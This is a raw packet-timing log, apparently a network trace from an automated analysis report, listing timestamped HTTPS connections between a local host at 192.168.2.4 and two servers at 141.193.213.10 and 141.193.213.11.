                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282887936 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282910109 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282917976 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282934904 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.282970905 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.283001900 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.283025980 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285046101 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285317898 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285375118 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285532951 CET49761443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285552025 CET44349761141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285701990 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285851955 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285901070 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.285912037 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.286024094 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.286076069 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.286084890 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.286344051 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.286398888 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.287966013 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288079023 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288142920 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288165092 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288192034 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288239002 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288275957 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288422108 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288472891 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288494110 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288688898 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.288743019 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289252996 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289525986 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289577961 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289616108 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289623976 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289705038 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.289746046 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.291532040 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.291584015 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.291654110 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.296228886 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.296257973 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.297097921 CET49763443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.297110081 CET44349763141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.297461987 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.297502995 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.297509909 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.298472881 CET49760443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.298485994 CET44349760141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.299268007 CET49759443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.299273014 CET44349759141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.299619913 CET49764443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.299638033 CET44349764141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.311709881 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.311747074 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.311821938 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.311984062 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.312009096 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.313507080 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.313530922 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.313579082 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.313782930 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.313797951 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.315299034 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.315330029 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.315396070 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.315552950 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.315567017 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.349371910 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.349383116 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.401833057 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.402612925 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.447786093 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.447845936 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.479126930 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.479185104 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.479208946 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.487555027 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.487652063 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.487665892 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.495918036 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.495970011 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.495976925 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.495992899 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.496042013 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.504436970 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.512746096 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.512794971 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.512809038 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.521094084 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.521311998 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.521326065 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.529562950 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.529612064 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.529624939 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.538249969 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.538310051 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.538321972 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.552782059 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.552874088 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.552915096 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.552931070 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.552983999 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.559509039 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.566164970 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.566339016 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.566387892 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.566401005 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.567173004 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.667161942 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.670322895 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.670460939 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.670521021 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.675349951 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.675425053 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.675441027 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.680258989 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.680402040 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.680414915 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.689655066 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.689732075 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.689744949 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.689815998 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.698519945 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.698529005 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.698582888 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.707175016 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.707231045 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.707243919 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.715754032 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.715815067 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.715827942 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.715876102 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.720170021 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.720232964 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.728674889 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.728734970 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.728746891 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.728806019 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.728857994 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.729573011 CET49762443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:45.729599953 CET44349762141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.088776112 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.088849068 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.088954926 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.089365959 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.089400053 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.333914042 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.334687948 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.334753990 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.335083008 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.335285902 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.335361958 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.335661888 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.335676908 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.335923910 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.339519024 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.348623991 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.348829985 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.348834991 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.348875999 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.349163055 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.351973057 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.352143049 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.352154016 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.352159977 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.352741003 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.352802038 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.352967024 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.353085995 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.353146076 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.353514910 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.354046106 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.354238033 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.354270935 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.395359039 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.397510052 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.397526979 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.399354935 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.399369955 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.522563934 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.522991896 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.523052931 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.526058912 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.526390076 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.526431084 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.526520014 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.526602983 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.526930094 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.527062893 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.527232885 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.527251005 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.528050900 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.528126001 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.528459072 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.528572083 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.528719902 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.528736115 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.529743910 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.529946089 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.529958010 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.530669928 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.530834913 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.530858994 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.533509970 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.533617973 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.533970118 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.534106970 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.534118891 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.534137011 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.534377098 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.534456015 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.534912109 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.535007954 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.535018921 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.535093069 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.568908930 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.568958044 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.584017038 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.584023952 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.584065914 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.584084988 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.638966084 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.639141083 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781407118 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781455040 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781495094 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781546116 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781558990 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781579018 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781598091 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781618118 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781706095 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.781729937 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782258034 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782402039 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782493114 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782566071 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782581091 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782624960 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782650948 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782867908 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.782968998 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.783905983 CET49766443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.783942938 CET44349766141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.783946991 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.783976078 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.784049034 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.784049988 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.784094095 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.785130024 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.785249949 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.785366058 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.785387039 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.785465002 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.785520077 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.787470102 CET49769443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.787499905 CET44349769141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.789712906 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.789787054 CET49767443192.168.2.4141.193.213.10
